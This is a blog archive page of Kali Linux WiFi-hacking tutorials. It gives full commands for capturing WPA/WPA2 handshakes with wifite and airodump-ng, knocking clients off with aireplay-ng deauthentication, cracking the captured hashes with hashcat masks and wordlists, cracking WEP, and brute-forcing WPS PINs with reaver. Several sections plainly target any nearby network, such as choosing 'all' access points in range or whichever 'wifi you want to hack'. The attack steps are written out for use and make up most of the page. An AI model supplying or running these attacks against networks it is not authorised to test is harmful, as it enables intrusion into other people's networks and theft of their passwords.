Tag Archives: WiFi

CRACKING WiFi WPA WPA2 WITH HASHCAT ON KALI LINUX (BRUTEFORCE MASK BASED ATTACK ON WIFI PASSWORDS)

Cracking WPA WPA2 with Hashcat oclHashcat or cudaHashcat on Kali Linux (BruteForce MASK based attack on Wifi passwords)

cudaHashcat or oclHashcat or Hashcat on Kali Linux got built-in capabilities to attack and decrypt or crack WPA WPA2 handshake.cap files. Only constraint is, you need to convert a .cap file to a.hccap file format. This is rather easy.

Important Note: Many users try to capture with network cards that are not supported. You should purchase a card that supports Kali Linux including injection and monitor mode etc. A list can be found in802.11 Recommended USB Wireless Cards for Kali Linux. It is very important that you have a supported card, otherwise you’ll be just wasting time and effort on something that just won’t do the job.
[toc]

My Setup

I have a NVIDIA GTX 210 Graphics card in my machine running Kali Linux 1.0.6 and will use rockyou dictionary for most of the exercise. In this post, I will show How to crack WPA/WPA2 handshake file (.cap files) with cudaHashcat or oclHashcat or Hashcat on Kali Linux.

I will use cudahashcat command because I am using a NVIDIA GPU. If you’re using AMD GPU, then I guess you’ll be using oclHashcat. Let me know if this assumptions is incorrect.

Why use Hashcat to crack WPA/WPA2 handshake file?

Pyrit is the fastest when it comes to cracking WPA/WPA2 handshake files. So why are we using Hashcat to crack WPA/WPA2 handshake files?

  1. Because we can?
  2. Because Hashcat allows us to use customized attacks with predefined rules and Masks.

Now this doesn’t explain much and reading HASHCAT Wiki will take forever to explain on how to do it. I’ll just give some examples to clear it up.

Hashcat allows you to use the following built-in charsets to attack a WPA/WPA2 handshake file.

Built-in charsets

?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?s = !”#$%&'()*+,-./:;⇔?@[]^_`{|}~

?a = ?l?u?d?s

Numbered passwords

So lets say you password is 12345678. You can use a custom MASK like ?d?d?d?d?d?d?d?d

What it means is that you’re trying to break a 8 digit number password like 12345678 or 23456789 or 01567891.. You get the idea.

Letter passwords – All uppercase

If your password is all letters in CAPS such as: ABCFEFGH orLKHJHIOP or ZBTGYHQS ..etc. then you can use the following MASK:

?u?u?u?u?u?u?u?u

It will crack all 8 Letter passwords in CAPS.

Letter passwords – All lowercase

If your password is all letters in lowercase such as: abcdefgh ordfghpoiu or bnmiopty..etc. then you can use the following MASK:

?l?l?l?l?l?l?l?l

It will crack all 8 Letter passwords in lowercase. I hope you now know where I am getting at.

Passwords – Lowercase letters and numbers

If you know your password is similar to this: a1b2c3d4 or p9o8i7u6or n4j2k5l6 …etc. then you can use the following MASK:

?l?d?l?d?l?d?l?d

Passwords – Uppercase letters and numbers

If you know your password is similar to this: A1B2C3D4 or P9O8I7U6or N4J2K5L6 …etc. then you can use the following MASK:

?u?d?u?d?u?d?u?d

Passwords – Mixed matched with uppercase, lowercase, number and special characters.

If you password is all random, then you can just use a MASK like the following:

?a?a?a?a?a?a?a?a

Note: ?a represents anything …. I hope you’re getting the idea.

If you are absolutely not sure, you can just use any of the predefined MASKs file and leave it running. But yeah, come back to check in a million years for a really long password …. Using a dictionary attack might have more success in that scenario.

Passwords – when you know a few characters

If you somehow know the few characters in the password, this will make things a lot faster. For every known letter, you save immense amount of computing time. MASK’s allows you to combine this. Let’s say your 8 character password starts with abc, doesn’t contain any special characters. Then you can create a MASK rule file to contain the following:

abc?l?l?l?l?l
abc?u?u?u?u?u
abc?d?d?d?d?d
abc?l?u??d??d?l
abc?d?d?l?u?l

There will be 125 combinations in this case. But it will surely break it in time. This is the true power of using cudaHashcat or oclHashcat or Hashcat on Kali Linux to break WPA/WPA2 passwords.

You can even up your system if you know how a person combines a password. Some people always uses UPPERCASE as the first character in their passwords, few lowercase letters and finishes with numbers.

ExampleAbcde123

Your mask will be:

?u?l?l?l?l?d?d?d

This will make cracking significantly faster. Social engineering is the key here.

That’s enough with MASK’s. Now let’s capture some WPA/WPA2 handshake files.

Capture handshake with WiFite

Why WiFite instead of other guides that uses Aircrack-ng? Because we don’t have to type in commands..

Type in the following command in your Kali Linux terminal:

wifite –wpa

You could also type in

wifite wpa2

If you want to see everything, (wepwpa or wpa2, just type the following command. It doesn’t make any differences except few more minutes

wifite

Once you type in following is what you’ll see.

1 - Wifite - Cracking Wifi WPAWPA2 passwords using pyrit and cowpatty - blackMORE Ops

So, we can see bunch of Access Points (AP in short). Always try to go for the ones with CLIENTS because it’s just much faster. You can choose all or pick by numbers. See screenshot below

2 - Wifite Screen - Cracking Wifi WPAWPA2 passwords using pyrit and cowpatty - blackMORE Ops

Awesome, we’ve got few with clients attached. I will pick 1 and 2 cause they have the best signal strength. Try picking the ones with good signal strength. If you pick one with poor signal, you might be waiting a LONG time before you capture anything .. if anything at all.

So I’ve picked 1 and 2. Press Enter to let WiFite do it’s magic.

3 - WiFite Choice - Cracking Wifi WPAWPA2 passwords using pyrit and cowpatty - blackMORE Ops

Once you press ENTER, following is what you will see. I got impatient as the number 1 choice wasn’t doing anything for a LONG time. So I pressed CTRL+C to quit out of it.

This is actually a great feature of WIfite. It now asks me,

What do you want to do?

  1. [c]ontinue attacking targets
  2. [e]xit completely.

I can type in c to continue or e to exit. This is the feature I was talking about. I typed c to continue. What it does, it skips choice 1 and starts attacking choice 2. This is a great feature cause not all routers or AP’s or targets will respond to an attack the similar way. You could of course wait and eventually get a respond, but if you’re just after ANY AP’s, it just saves time.

4 - WiFite continue - Cracking Wifi WPAWPA2 passwords using pyrit and cowpatty - blackMORE Ops

And voila, took it only few seconds to capture a handshake. This AP had lots of clients and I managed to capture a handshake.

This handshake was saved in /root/hs/BigPond_58-98-35-E9-2B-8D.cap file.

Once the capture is complete and there’s no more AP’s to attack, Wifite will just quit and you get your prompt back.

5 - WiFite captured handshake - Cracking Wifi WPAWPA2 passwords using pyrit and cowpatty - blackMORE Ops

Now that we have a capture file with handshake on it, we can do a few things.

Cleanup your cap file using wpaclean

Next step will be converting the .cap file to a format cudaHashcat or oclHashcat or Hashcat on Kali Linux will understand.

Here’s how to do it:

To convert your .cap files manually in Kali Linux, use the following command

wpaclean <out.cap> <in.cap>

Please note that the wpaclean options are the wrong way round. <out.cap> <in.cap> instead of <in.cap> <out.cap> which may cause some confusion.

In my case, the command is as follows:

wpaclean hs/out.cap hs/BigPond_58-98-35-E9-2B-8D.cap

Convert .cap file to .hccap format

We need to convert this file to a format cudaHashcat or oclHashcat or Hashcat on Kali Linux can understand.

To convert it to .hccap format with “aircrack-ng” we need to use the -J option

aircrack-ng <out.cap> -J <out.hccap>

Note the -J is a capitol J not lower case j.

In my case, the command is as follows:

aircrack-ng hs/out.cap -J hs/out

Cracking WPAWPA2 with oclHashcat, cudaHashcat or Hashcat on Kali Linux (BruteForce MASK based attack) - blackMORE Ops - 1

Cracking WPA/WPA2 handshake with Hashcat

cudaHashcat or oclHashcat or Hashcat on Kali Linux is very flexible, so I’ll cover two most common and basic scenarios:

  1. Dictionary attack
  2. Mask attack

Dictionary attack

Grab some Wordlists, like Rockyou.

Read this guide Cracking Wifi WPA/WPA2 passwords using pyrit cowpatty in Kali Linux for detailed instructions on how to get this dictionary file and sorting/cleaning etc.

First we need to find out which mode to use for WPA/WPA2 handshake file. I’ve covered this in great length in Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat on Kali Linuxguide. Here’s a short rundown:

cudahashcat --help | grep WPA

So it’s 2500.

Now use the following command to start the cracking process:

cudahashcat -m 2500 /root/hs/out.hccap /root/rockyou.txt

Cracking WPAWPA2 with oclHashcat, cudaHashcat or Hashcat on Kali Linux (BruteForce MASK based attack) - blackMORE Ops - 2

Bingo, I used a common password for this Wireless AP. Took me few seconds to crack it. Depending on your dictionary size, it might take a while.

You should remember, if you’re going to use Dictionary attack, Pyrit would be much much much faster than cudaHashcat or oclHashcat or Hashcat. Why we are showing this here? Cause we can. 🙂

Another guide explains how this whole Dictionary attack works. I am not going to explain the same thing twice here. Read Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat on Kali Linux for dictionary related attacks in full length.

Brute-Force Attack

Now this is the main part of this guide. Using Brute Force MASK attack.

To crack WPA WPA2 handshake file using cudaHashcat or oclHashcat or Hashcat, use the following command:

Sample:

cudahashcat -m 2500 -a 3 capture.hccap ?d?d?d?d?d?d?d?d

Where -m = 2500 means we are attacking a WPA/WPA2 handshake file.

-a = 3 means we are using Brute Force Attack mode (this is compatible with MASK attack).

capture.hccap = This is your converted .cap file. We generated it using wpaclean and aircrack-ng.

?d?d?d?d?d?d?d?d = This is your MASK where d = digit. That means this password is all in numbers. i.e. 7896435 or 12345678etc.

I’ve created a special MASK file to make things faster. You should create your own MASK file in similar way I explained earlier. I’ve saved my file in the following directory as blackmoreops-1.hcmask.

/usr/share/oclhashcat/masks/blackmoreops-1.hcmask

Do the following to see all available default MASK files provided by cudaHashcat or oclHashcat or Hashcat:

ls /usr/share/oclhashcat/masks/

In my case, the command is as follows:

cudahashcat -m 2500 -a 3 /root/hs/out.hccap  /usr/share/oclhashcat/masks/blackmoreops-1.hcmask

Cracking WPA WPA2 with oclHashcat, cudaHashcat or Hashcat on Kali Linux (BruteForce MASK based attack) - blackMORE Ops - 3

Sample .hcmask file

You can check the content of a sample .hcmask file using the following command:

tail -10 /usr/share/oclhashcat/masks/8char-1l-1u-1d-1s-compliant.hcmask

Cracking WPAWPA2 with oclHashcat, cudaHashcat or Hashcat on Kali Linux (BruteForce MASK based attack) - blackMORE Ops - 4

Edit this file to match your requirement, run Hashcat or cudaHashcat and let it rip.

Location of Cracked passwords

Hashcat or cudaHashcat saves all recovered passwords in a file. It will be in the same directory you’ve ran Hashcat or cudaHashcat or oclHashcat. In my case, I’ve ran all command from my home directory which is /root directory.

cat hashcat.pot

Cracking WPA WPA2 with oclHashcat, cudaHashcat or Hashcat on Kali Linux (BruteForce MASK based attack) - blackMORE Ops - 5

Advertisements

Hack WiFi WPA-2 PSK Capturing the Handshake

WPA password hacking


Okay, so hacking WPA-2 PSK involves 2 main steps-

  1. Getting a handshake (it contains the hash of password, i.e. encrypted password)
  2. Cracking the hash.

Now the first step is conceptually easy. What you need is you, the attacker, a client who’ll connect to the wireless network, and the wireless access point. What happens is when the client and access point communicate in order to authenticate the client, they have a 4 way handshake that we can capture. This handshake has the hash of the password. Now there’s no direct way of getting the password out of the hash, and thus hashing is a robust protection method. But there is one thing we can do. We can take all possible passwords that can exists, and convert them to hash. Then we’ll match the hash we created with the one that’s there in the handshake. Now if the hashes match, we know what plain text password gave rise to the hash, thus we know the password. If the process sounds really time consuming to you, then its because it is. WPA hacking (and hash cracking in general) is pretty resource intensive and time taking process. Now there are various different ways cracking of WPA can be done. But since WPA is a long shot, we shall first look at the process of capturing a handshake. We will also see what problems one can face during the process (I’ll face the problems for you). Also, before that, some optional wikipedia theory on what a 4-way handshake really is (you don’t want to become a script kiddie do you?)

The Four-Way Handshake

The authentication process leaves two considerations: the access point (AP) still needs to authenticate itself to the client station (STA), and keys to encrypt the traffic need to be derived. The earlier EAP exchange or WPA2-PSK has provided the shared secret key PMK (Pairwise Master Key). This key is, however, designed to last the entire session and should be exposed as little as possible. Therefore the four-way handshake is used to establish another key called the PTK (Pairwise Transient Key). The PTK is generated by concatenating the following attributes: PMK, AP nonce (ANonce), STA nonce (SNonce), AP MAC address, and STA MAC address. The product is then put through PBKDF2-SHA1 as the cryptographic hash function.
The handshake also yields the GTK (Group Temporal Key), used to decrypt multicast and broadcast traffic. The actual messages exchanged during the handshake are depicted in the figure and explained below:

  1. The AP sends a nonce-value to the STA (ANonce). The client now has all the attributes to construct the PTK.
  2. The STA sends its own nonce-value (SNonce) to the AP together with a MIC, including authentication, which is really a Message Authentication and Integrity Code: (MAIC).
  3. The AP sends the GTK and a sequence number together with another MIC. This sequence number will be used in the next multicast or broadcast frame, so that the receiving STA can perform basic replay detection.
  4. The STA sends a confirmation to the AP.

All the above messages are sent as EAPOL-Key frames.
As soon as the PTK is obtained it is divided into five separate keys:
PTK (Pairwise Transient Key – 64 bytes)

  1. 16 bytes of EAPOL-Key Confirmation Key (KCK)– Used to compute MIC on WPA EAPOL Key message
  2. 16 bytes of EAPOL-Key Encryption Key (KEK) – AP uses this key to encrypt additional data sent (in the ‘Key Data’ field) to the client (for example, the RSN IE or the GTK)
  3. 16 bytes of Temporal Key (TK) – Used to encrypt/decrypt Unicast data packets
  4. 8 bytes of Michael MIC Authenticator Tx Key – Used to compute MIC on unicast data packets transmitted by the AP
  5. 8 bytes of Michael MIC Authenticator Rx Key – Used to compute MIC on unicast data packets transmitted by the station

The Michael MIC Authenticator Tx/Rx Keys provided in the handshake are only used if the network is using TKIP to encrypt the data.


 By the way, if you didn’t understand much of it then don’t worry. There’s a reason why people don’t  search for hacking tutorials on Wikipedia (half the stuff goes above the head)

Capturing The Handshake

Now there are several (only 2 listed here) ways of capturing the handshake. We’ll look at them one by one-

  1. Wifite (easy and automatic)
  2. Airodump-ng (easy but not automatic, you manually have to do what wifite did on its own)

Wifite

Methodology

We’ll go with the easy one first. Now you need to realize that for a handshake to be captured, there needs to be a handshake. Now there are 2 options, you could either sit there and wait till a new client shows up and connects to the WPA network, or you can force the already connected clients to disconnect, and when they connect back, you capture their handshake. Now while other tutorials don’t mention this, I will (such a good guy I am 🙂 ). Your network card is good at receiving packets, but not as good in creating them. Now if your clients are very far from you, your deauth requests (i.e. please get off this connection request) won’t reach them, and you’ll keep wondering why you aren’t getting any handshake (the same kind of problem is faced during ARP injection and other kind of attacks too). So, the idea is to be as close to the access point (router) and the clients as possible. Now the methodology is same for wifite and airodump-ng method, but  wifite does all this crap for you, and in case of airodump-ng, you’ll have to call a brethren (airreply-ng) to your rescue. Okay enough theory.

Get the handshake with wifite

Now my configuration here is quite simple. I have my cellphone creating a wireless network named ‘me’ protected with wpa-2. Now currently no one is connected to the network. Lets try and see what wifite can do.

root@kali:~# wifite
.;’                     `;,
.;’  ,;’             `;,  `;,   WiFite v2 (r85)
.;’  ,;’  ,;’     `;,  `;,  `;,
::   ::   :   ( )   :   ::   ::  automated wireless auditor
‘:.  ‘:.  ‘:. /_ ,:’  ,:’  ,:’
‘:.  ‘:.    /___    ,:’  ,:’   designed for Linux
‘:.       /_____      ,:’
/      

[+] scanning for wireless devices…
[+] enabling monitor mode on wlan0… done
[+] initializing scan (mon0), updates at 5 sec intervals, CTRL+C when ready.
[0:00:04] scanning wireless networks. 0 targets and 0 clients found

[+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
— ——————–  —  —-  —–  —-  ——
1  me                     1  WPA2  57db   wps
2  *******              11  WEP   21db    no   client
3  **************   11  WEP   21db    no


Now as you can see, my network showed up as ‘me’. I pressed ctrl+c and wifite asked me which target to attack (the network has wps enabled. This is an added bonus, reaver can save you from all the trouble. Also, wifite will use reaver too to skip the whole WPA cracking process and use a WPS flaw instead. We have a tutorial on hacking WPA WPS using Reaver already, in this tutorial we’ll forget that this network has WPS and capture the handshake instead)
[+] select target numbers (1-3) separated by commas, or ‘all’: 
Now I selected the first target,  i.e. me. As expected, it had two attacks in store for us. First it tried the PIN guessing attack. It has almost 100% success rate, and would have given us the password had I waited for 2-3 hours. But I pressed ctrl+c and it tried to capture the handshake. I waited for 10-20 secs, and then pressd ctrl+c. No client was there so no handshake could be captured. Here’s what happened.

[+] 1 target selected.
[0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED)
^C0:00:24] WPS attack, 0/0 success/ttl,
(^C) WPS brute-force attack interrupted
[0:08:20] starting wpa handshake capture on “me”
[0:08:05] listening for handshake…
(^C) WPA handshake capture interrupted
[+] 2 attacks completed:
[+] 0/2 WPA attacks succeeded
[+] disabling monitor mode on mon0… done
[+] quitting


Now I connected my other PC to ‘me’. Lets do it again. This time a client will show up, and wifite will de-authenticate it, and it’ll try to connect again. Lets see what happens this time around.


   NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
— ——————–  —  —-  —–  —-  ——
1  *    1  WPA   99db    no   client
2  me  1 WPA2  47db   wps   client
3  *    11  WEP   22db    no   clients
4  *   11  WEP   20db    no

[+] select target numbers (1-4) separated by commas, or ‘all’: 2
[+] 1 target selected.
[0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED)
^C0:00:07] WPS attack, 0/0 success/ttl,
(^C) WPS brute-force attack interrupted
[0:08:20] starting wpa handshake capture on “me”
[0:07:51] listening for handshake…
(^C) WPA handshake capture interrupted
[+] 2 attacks completed:
[+] 0/2 WPA attacks succeeded
[+] quitting



Now the deauth attacks weren’t working. This time I increased the deauth frequency.
root@kali:~# wifite -wpadt 1
Soon, however, I realized, that the problem was that I was using my internal card (Kali Live USB). It does not support packet injection, so deauth wasn’t working. So time to bring my external card to the scene.

root@kali:~# wifite
.;’                     `;,
.;’  ,;’             `;,  `;,   WiFite v2 (r85)
.;’  ,;’  ,;’     `;,  `;,  `;,
::   ::   :   ( )   :   ::   ::  automated wireless auditor
‘:.  ‘:.  ‘:. /_ ,:’  ,:’  ,:’
‘:.  ‘:.    /___    ,:’  ,:’   designed for Linux
‘:.       /_____      ,:’
/      

[+] scanning for wireless devices…
[+] available wireless devices:
1. wlan1        Ralink RT2870/3070    rt2800usb – [phy1]
2. wlan0        Atheros     ath9k – [phy0]
[+] select number of device to put into monitor mode (1-2):



See, we can use the USB card now. This will solve the problems for us.
Now look at wifite output

   NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
— ——————–  —  —-  —–  —-  ——
1  me                     1  WPA2  44db   wps   client
2  *                       11  WEP   16db    no   client
3  *                         11  WEP   16db    no

[+] select target numbers (1-3) separated by commas, or ‘all’:
Now I attack the target. This time, finally, I captured a handshake.
[+] 1 target selected.
[0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED)
^C0:00:01] WPS attack, 0/0 success/ttl,
(^C) WPS brute-force attack interrupted
[0:08:20] starting wpa handshake capture on “me”
[0:07:23] listening for handshake…
[0:00:57] handshake captured! saved as “hs/me_02-73-8D-**-**-**.cap”
[+] 2 attacks completed:
[+] 1/2 WPA attacks succeeded
me (02:73:8D:37:A7:ED) handshake captured
saved as hs/me_02-73-8D-**-**-**.cap

[+] starting WPA cracker on 1 handshake
[!] no WPA dictionary found! use -dict <file> command-line argument
[+] disabling monitor mode on mon0… done
[+] quitting

As you can see, it took me 57 seconds to capture the handshake (5 deauth requests were sent, one every 10 secs is defualt). The no dictionary error shouldn’t bother you. We’ll use Wifite only to capture the handshake. Now the captured handshake was saved as a .cap file which can be cracked using aircrack, pyrit, hashcat (after converting .hccap), etc. using either a wordlist or bruteforce. Let’s see how to do the same thing with airodump-ng. This time I won’t show you the problems you might run into. It’ll be a perfect ride, all the problems were seen in wifite case.



Capturing Handshake with Airodump-ng

Now if you skipped everything and got right here, then you are missing a lot of things. I’ll end this pretty quick, as the wifite thing was quite detailed. I’m copying stuff from http://www.kalitutorials.net/2013/08/wifi-hacking-wep.html where I already discussed airodump-ng. (If you are not a newbie, skip to the point where you see red text)

1. Find out the name of your wireless adapter.


Alright, now, your computer has many network adapters, so to scan one, you need to know its name. So there are basically the following things that you need to know-
  • lo – loopback. Not important currently.
  • eth – ethernet
  • wlan – This is what we want. Note the suffix associated.
Now, to see all the adapters, type ifconfig on a terminal. See the result. Note down the wlan(0/1/2) adapter.

Trouble with the wlan interface not showing up. This is because virtual machines can’t use internal wireless cards and you will have to use external cards. You should try booting Kali using Live USB (just look at the first part of this tutorial), or buy an external card.

2. Enable Monitor mode

Now, we use a tool called airmon-ng to  create a virtual interface called mon. Just type

airmon-ng start wlan0

 Your mon0 interface will be created.



3. Start capturing packets

Now, we’ll use airodump-ng to capture the packets in the air. This tool gathers data from the wireless packets in the air. You’ll see the name of the wifi you want to hack.

airodump-ng mon0

 

4. Store the captured packets in a file

This can be achieved by giving some more parameters with the airodump command

airodump-ng mon0 –write name_of_file

Non newbies-
root@kali:~# airmon-ng start wlan1
root@kali:~# airodump-ng mon0 -w anynamehere

 Now copy the bssid field of your target network (from airodump-ng ng screen)and launch a deauth attack with aireplay-ng

 root@kali:~# aireplay-ng –deauth 0 -a BSSID here mon0

The –deauth tells aireplay to launch a deauth attack. 0 tell it to fire it at interval of 0 secs (very fast so run it only for a few secs and press ctrl+c). -a will required BSSID and replace BSSID here with your target BSSID. mon0 is the interface you created.
In case you face problems with the monitor mode hopping from one channel to another, or problem with beacon frame, then fix mon0 on a channel using-
root@kali:~# airodump-ng mon0 -w anynamehere -c 1
Replace 1 with the channel where your target AP is. You might also need to add –ignore-negative-one if aireplay demands it. In my case airodump-ng says fixed channel mon0: -1 so this was required. (It’s a bug with aircrack-ng suite). 

Now when you look at the airodump-ng screen, you’ll see that at the top right it says WPA handshake captured . Here is what it looks like

 CH  1 ][ Elapsed: 24 s ][ 2014-06-13 22:41 ][ WPA handshake: **

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

02:73:8D:37:A7:ED  -47  75      201       35    0   1  54e  WPA2 CCMP   PSK  me

BSSID              STATION            PWR   Rate    Lost    Frames  Probe

*                     *                            0    0e- 1    742       82  me
*                       *                           -35  0e- 1      0   26


You can confirm it by typing the following

root@kali:~# aircrack-ng anynamehere-01.cap
Opening anynamehere-01.cap
Read 212 packets.
#  BSSID              ESSID                     Encryption
1  **************  me                        WPA (1 handshake)
2  **                          Unknown




Wifite – Hacking Wifi The Easy Way Kali Linux

Wifite

While the aircrack-ng suite is a well known name in the wireless hacking , the same can’t be said about Wifite. Living in the shade of the greatness of established aircrack-ng suite, Wifite has finally made a mark in a field where aircrack-ng failed. It made wifi hacking everyone’s piece of cake. While all its features are not independent (eg. it hacks WPS using reaver), it does what it promises, and puts hacking on autopilot. I’m listing some features, before I tell you how to use wifite (which I don’t think is necessary at all, as anyone who can understand simple English instructions given by Wifite can use it on his own).

Features Of Wifite

  • Sorts targets by signal strength (in dB); cracks closest access points first
  • Automatically de-authenticates clients of hidden networks to reveal SSIDs
  • Numerous filters to specify exactly what to attack (wep/wpa/both, above certain signal strengths, channels, etc)
  • Customizable settings (timeouts, packets/sec, etc)
  • “Anonymous” feature; changes MAC to a random address before attacking, then changes back when attacks are complete
  • All captured WPA handshakes are backed up to wifite.py’s current directory
  • Smart WPA de-authentication; cycles between all clients and broadcast deauths
  • Stop any attack with Ctrl+C, with options to continue, move onto next target, skip to cracking, or exit
  • Displays session summary at exit; shows any cracked keys
  • All passwords saved to cracked.txt
  • Built-in updater: ./wifite.py -upgrade

I find it worth mentioning here, that not only does it hack wifi the easy way, it also hack in the best possible way.  For example, when you are hacking a WEP wifi using Wifite, it uses fakeauth and uses the ARP method to speed up data packets

Hacking WEP network

If you’ve followed my previous posts on Hacking Wifi (WEP), you know there’s a lot of homework you have to do before you even start hacking. But not here. With Wifite, its as easy and simple as a single command.

wifite -wep

You might even have used the command

wifite

If you see any error at this stage move to the bottom of the page for troubleshooting tips. If your issue is not listed please comment. We reply within a day.
The -wep makes it clear to wifite that you want to hack WEP wifis only. It’ll scan the networks for you, and when you think it has scanned enough, you can tell it to stop by typing ctrl+c. It’ll then ask you which wifi to hack. In my case, I didn’t specify -wep so it shows all the wifis in range.

You can also select all and then go take a nap (or maybe go to sleep). When you wake up, you might be hacking all the wifi passwords in front of you. I typed one and it had gathered 7000 IVs (data packets) within 5 mins. Basically you can except it to hack the wifi in 10 mins approx. Notice how it automatically did the fake auth and ARP replay.

Here are a few more screenshots of the working of Wifite, from their official website (./wifite.py is not something that should bother you. You can stick with the simple wifite. Also, specifying the channel is optional so even the -c 6 was unnecessary. Notice that instead of ARP replay, the fragmentation attack was used, using -frag) –

 Hacking WPS wasn’t fast (it took hours), but it was easy and didn’t require you to do anything but wait.

Note, the limitation that many reader on my blog are beginners forbid me from introducing too many attacks. I made a tutorial about ARP replay attack, and that too was detailed as hell. However, Wifite makes it possible for you to use any method that you want to use, by just naming it. As you saw in the screenshot above, the fragmentation attack was carried out just by typing -frag. Similarly, many other attacks can be played with. A good idea would be to execute the following-

wifite -help

This will tell you about the common usage commands, which will be very useful. Here is the list of WEP commands for different attacks-
WEP
-wep        only target WEP networks [off]
-pps <num>  set the number of packets per second to inject [600]
-wept <sec> sec to wait for each attack, 0 implies endless [600]
-chopchop   use chopchop attack      [on]
-arpreplay  use arpreplay attack     [on]
-fragment   use fragmentation attack [on]
-caffelatte use caffe-latte attack   [on]
-p0841      use -p0841 attack        [on]
-hirte      use hirte (cfrag) attack [on]
-nofakeauth stop attack if fake authentication fails    [off]
-wepca <n>  start cracking when number of ivs surpass n [10000]
-wepsave    save a copy of .cap files to this directory [off]

As you can see, its the same thing as is there on the help screenshot. Play around with the attacks and see what you can do. Hacking WPA without WPS wouldn’t be that easy, and while I don’t usually do this, I’m providing a link to an external website for the tutorial . This is the best WPA cracking tutorial I’ve seen, and I can’t write a better one. It’s highly detailed, and I’m just hoping I don’t lose my audience to that website. Here is the tutorial – Cracking Wifi WPA/WPA2 passwords 

Troubleshooting

Wifite quits unexpectedly, sating “Scanning for wireless devices. No wireless interfaces were found. You need to plug in a wifi device or install drivers. Quitting.”
You are using Kali inside a virtual machine most probably. Virtual machine does not support internal wireless card. Either buy an external wireless card, or do a live boot / side boot with Windows. Anything other than Virtual machine in general.
wifi hackING

Wifi Hacking – WEP – Aircrack-ng suite Kali Linux

Wifi Hacking – WEP –  Aircrack-ng suite Kali Linux
Alright, now, your computer has many network adapters, so to scan one, you need to know its name. So there are basically the following things that you need to know-
  • lo – loopback. Not important currently.
  • eth – ethernet
  • wlan – This is what we want. Note the suffix associated.
Now, to see all the adapters, type ifconfig on a terminal. See the result. Note down the wlan(0/1/2) adapter.

2. Enable Monitor mode

Now, we use a tool called airmon-ng to  create a virtual interface called mon. Just type

airmon-ng start wlan0

 Your mon0 interface will be created.



3. Start capturing packets

Now, we’ll use airodump-ng to capture the packets in the air. This tool gathers data from the wireless packets in the air. You’ll see the name of the wifi you want to hack.

airodump-ng mon0

 

4. Store the captured packets in a file

This can be achieved by giving some more parameters with the airodump command

airodump-ng mon0 –write name_of_file


Now the captured packets will be stored in name_of_file.cap
You have to wait till you have enough data (10000 minimum)

5. Crack the wifi

If all goes well ,then you’ll be sitting in front of your pc, grinning, finally you’ve got 10000 packets (don’t stop the packet capture yet). Now, you can use aircrack-ng to crack the password. (in a new terminal)

aircrack-ng name_of_file-01.cap 

The program will ask which wifi to crack, if there are multiple available. Choose the wifi. It’ll do its job. If the password is weak enough, then you’ll get it in front of you. If not, the program will tell you to get more packets. The program will retry again when there are 15000 packets, and so on.

Note : This will not work with WPA-2. Here is a tutorial on hacking wpa/wpa-2 wps with reaver on kali linux

Troubleshooting : Check this link if you failed to hack the network. 

HACK WIFI

Hack WPA/WPA2 WPS With Reaver – Kali Linux

 Working Of WPS

Now while most of the things are the same as in WPA, there is a new concept of using pins for authentication. So basically, the client sends 8 digit pins to the access point, which verifies it and then allows the client to connect. Now a pin has 8 digits, and only contains numbers, so its a possible target for bruteforece. Under normal bruteforcing of WPA passwords, you have to consider the fact that there may be number, alphabets, and sometimes symbols (and more than 8 letters). This make the task a billion billion times tougher. However, we can try thousands of keys per second, which make it a tad bit easier. Now in WPS, there is a delay because we have to wait for APs response, and we may only try a few keys per second (practically the best I’ve seen on my PC is 1 key per 2 sec). Basically, 8 digits and 10 possibilities per digit (0-9) make it 10^8 (interpret ^ as raised to the power of)seconds if we assume one key per second. Now that’ll be years. So, where is this taking us? The answer is, there are flaws in this technology that can be used against it.
  • The 8th digit is a checksum of first 7 digits. 10^7 possibilities, i.e. one-tenth time. Two months, still a way to go.
  • The pin number for verification goes in two halves, so we can independently verify the first four and the last four digits. And believe me, its easy to guess 4 digits correct two times, than to guess 8 correct digits at once. Basically, the first half would take 10^4 guess and the second would take 10^3.
Now the guesses would be 10^4 + 10^3 (not 10^4 *10 ^3). Now we need 11,000 guesses.
So that’ll take 3 hours approximately. And that’s all the combinations, and most probably the correct pin will not be the last combination, so you can expect to reach the result earlier. However, the assumption is that bruteforcing will take place at a key per second. My personal best is a key every 2 seconds, and yours might drop to as low as a key every 10 seconds.

How to carry out the attack

Now it might have been tough to carry out this attack at some point in history, but now, its a breeze. If you have all the prerequisites, then hacking the network would be as easy as

reaver -i <interface-name> -b <BSSID of target>

And if you are already familiar with hacking WEP, then just go to your Kali Linux terminal and type the above command (replacing what needs to be replaced). Leave your machine as is, come back 10 mins later, check the progress (must be 1% or  something), and go take a nap. However, if you’re a newbie, then tag along.

Information Gathering

Now you need to find out the following about you target network-
  • Does it have WPS enabled. If not, then the attack will not work.
  • The BSSID of the network.
Now to check whether the network has WPS enabled or not, you can either use wash or just use the good oldairodump-ng. Wash is specifically meant to check whether a network has WPS enabled or not, and thereby is much easier to use. Here are the steps-
  • Set your wireless interface in monitor mode-

airmon-ng start wlan0

  •  Use wash (easy but sometimes unable to detect networks even when they have wps enabled). If any network shows up there, it has WPS enabled.

wash -i mon0

This will show all the networks with WPS enabled
This is an error which I haven’t figured out yet. If you see it, then you’ll have to do some howework, or move on to airodump method. Update :  wash -i mon0 –ignore-fcs  might solves the issue.
  • Use airodump-ng. It will show all networks around you. It tells which of them use WPA. You’ll have to assume they have WPS, and then move to next steps.

airodump-ng mon0

None of them has WPS enabled, just saying.

BSSID of the network – Now irrespective of what you used, you should have a BSSID column in the result that you get. Copy the BSSID of the network you want to hack. That’s all the information you need.

So by now you must have something like XX:XX:XX:XX:XX:XX, which is the BSSID of your target network. Keep this copied, as you’ll need it.

Reaver

Now finally we are going to use Reaver to get the password of the WPA/WPA2 network. Reaver makes hacking very easy, and all you need to do is enter-

reaver -i mon0 -b XX:XX:XX:XX:XX:XX

